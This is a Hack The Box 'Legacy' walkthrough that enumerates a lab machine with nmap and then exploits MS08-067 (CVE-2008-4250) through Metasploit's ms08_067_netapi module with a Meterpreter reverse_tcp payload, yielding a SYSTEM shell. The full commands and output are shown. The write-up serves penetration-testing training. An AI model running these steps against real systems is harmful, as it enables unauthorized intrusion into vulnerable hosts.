3/28/2022

HTB: Legacy

 ___  ___  _________  ________                                    
|\  \|\  \|\___   ___\\   __  \  ___                              
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                             
 \ \   __  \   \ \  \ \ \   __  \|__|                             
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                           
   \ \__\ \__\   \ \__\ \ \_______\|\__\                          
    \|__|\|__|    \|__|  \|_______|\|__|                          
 ___       _______   ________  ________  ________      ___    ___ 
|\  \     |\  ___ \ |\   ____\|\   __  \|\   ____\    |\  \  /  /|
\ \  \    \ \   __/|\ \  \___|\ \  \|\  \ \  \___|    \ \  \/  / /
 \ \  \    \ \  \_|/_\ \  \  __\ \   __  \ \  \        \ \    / / 
  \ \  \____\ \  \_|\ \ \  \|\  \ \  \ \  \ \  \____    \/  /  /  
   \ \_______\ \_______\ \_______\ \__\ \__\ \_______\__/  / /    
    \|_______|\|_______|\|_______|\|__|\|__|\|_______|\___/ /     
                                                     \|___|/         

Hack The Box's Legacy is an Easy machine that features the CVE-2008-4250 vulnerability which was first disclosed in 2008 and effected Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems. This vulnerability allows us to run remote attacks if the target receives a specially crafted RPC request. You can learn more about this vulnerability's CVE details here.

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.129.141.229

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sC and -sV switch to enable version detection and OS scanning on the network's ports. You can learn more about Nmap here. Note: I had to use the -Pn flag to skip host discovery in order to get proper scan results. You should receive the following output in your terminal:

nmap -sC -sV -Pn 10.129.141.229
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 21:53 GMT
Nmap scan report for 10.129.141.229
Host is up (0.0043s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:6f:40 (VMware)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-03-29T02:51:07+03:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.51 seconds

On open port 445 we can see that Windows XP is running. You can also see more details in the Host script results section. I suggest using your favorite search engine to always do some research on services running on open ports and their vulnerabilities. After doing some searching, we find we can exploit this using the MS08-067 Microsoft Server Service Relative Path Stack Corruption Metasploit module.

Open Metasploit in a new terminal by typing "msfconsole".

msfconsole
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command

msf6 > 

Lets search for the MS08-067 exploit using the "search" option.

msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

Metasploit returns a single option, which we are looking for, exploit/windows/smb/ms08_067_netapi. To use an exploit we can type "use" and then the exploits assigned index # value from the search results.

Once the exploit has loaded, type "options" and hit Enter. This will bring up the exploits options which we will need to configure.

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://gi
                                       thub.com/rapid7/metasploit-framewo
                                       rk/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRV
                                       SVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh
                                        , thread, process, none)
   LHOST     157.245.81.12    yes       The listen address (an interface
                                        may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > 

Our RHOSTS option is blank and is required to run the exploit. To set this we will need to type "set RHOSTS" then the IP of our target machine and hit Enter. We will see a confirmation line with the set RHOSTS IP.

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.141.229
RHOSTS => 10.129.141.229
msf6 exploit(windows/smb/ms08_067_netapi) >

Our RPORT is already properly set to port 445. You may need to change your Payload options LHOST and LPORT if you are using a VPN, Virtual Machine, or HTB PWNBOX. Most of the time, this can be done just by entering "set LHOST" followed by your interface, usually "tun0". With everything all set, it's time to run the exploit by typing "run" then hitting Enter.

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.51:4444 
[*] 10.129.141.229:445 - Automatically detecting the target...
[*] 10.129.141.229:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.141.229:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.141.229:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.141.229
[*] Meterpreter session 1 opened (10.10.14.51:4444 -> 10.129.141.229:1071) at 2022-03-23 22:08:22 +0000

meterpreter > 

We got a Meterpreter session! We can now type "shell" and hit Enter to get a shell on the target system!

meterpreter > shell
Process 884 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

You can now navigate through the target system to obtain the root and user .txt flags which are located within the user and administrator's Desktop folders.